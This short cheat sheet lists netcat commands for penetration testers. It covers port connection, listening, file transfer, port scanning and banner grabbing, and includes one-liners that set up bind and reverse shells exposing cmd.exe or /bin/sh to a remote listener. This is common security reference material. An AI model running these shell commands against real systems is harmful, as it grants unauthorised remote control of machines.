Netcat Cheat Sheet
Published on 20 Oct 2019
Useful cheat sheet for netcat..pentester swiss knife!
Connect to a TCP Port
nc -nv <IP Address> <Port>
Listen on a TCP Port
nc -lvp <port>
Connect and receive a HTTP Page
nc -nv <IP Address> 80
Transferring a File
nc -lvp 4444 >output.txt # Receiving End
nc -nv <IP Address> < input.txt # Sending End
Set up a Netcat Bind Shell (Windows)
nc -lvp 4444 -e cmd.exe
nc -nv <IP Address> 4444 # Connect to the shell
Set up a Netcat Bind Shell (Linux)
nc -lvp 4444 -e /bin/sh
nc -nv <IP Address> 4444 # Connect to the shell
Set up a Netcat Reverse Shell (Windows)
nc -lvp 443 # Attacker listening for connection
nc -nv <IP Address> 443 -e cmd.exe
Set up a Netcat Reverse Shell (Linux)
nc -lvp 443
nc -nv <IP Address> 443 -e /bin/sh
Netcat as a Port Scanner
nc -z <IP Address> <Port Range in abc - xyz format>
Netcat as a Banner Grabber
echo "" | nc -nv -w1 <IP Address> <Ports>